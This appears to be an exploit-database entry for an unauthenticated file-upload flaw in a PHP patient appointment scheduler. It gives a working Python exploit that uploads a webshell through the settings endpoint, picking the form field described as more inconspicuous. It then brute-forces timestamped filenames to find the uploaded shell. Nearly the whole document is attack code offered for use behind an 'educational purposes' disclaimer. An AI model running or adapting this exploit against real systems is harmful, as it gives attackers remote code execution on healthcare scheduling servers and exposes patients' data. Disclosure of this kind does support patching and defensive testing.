Exploits / Vulnerability Discovered : 2021-09-06 |
Type : webapps |
Platform : php
This exploit / vulnerability Patient appointment scheduler system 1.0 unauthenticated file upload is for educational purposes only and if it is used you will do on your own risk!
def exploit(url:str, file:str, delay:int) -> None:
if not os.path.exists(file):
logging.error(f'webshell payload "{file}"" does not exist?')
return
logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
uploadTime = int(time.time())
r = requests.post(url + '/classes/SystemSettings.php',
files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous
params={'f' : 'update_settings'},
verify=False
)
if not r.ok:
logging.error('HTTP upload request failed')
return
logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
for i in range(uploadTime - delay, uploadTime + delay + 1):
r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
# NOTE: website will send redirects for all files that do not exist
if r.status_code != 302:
logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
return
logging.error('failed to find payload on target')
logging.warning('maybe need a larger delay or uploads directory is not writable?')
return